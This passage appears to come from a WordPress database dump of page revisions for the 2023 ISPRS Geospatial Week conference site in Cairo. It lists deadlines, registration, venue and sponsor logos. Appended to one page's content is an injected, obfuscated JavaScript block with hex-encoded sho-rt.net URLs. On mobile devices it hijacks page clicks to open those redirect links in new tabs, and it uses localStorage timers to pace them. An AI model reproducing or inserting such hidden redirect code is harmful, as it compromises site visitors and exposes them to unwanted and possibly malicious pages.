css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:33:58','2023-04-16 20:33:58','',3066,'https://gsw2023.com/?p=4058',0,'revision','',0),
(4059,1,'2023-04-16 20:36:54','2023-04-16 20:36:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" 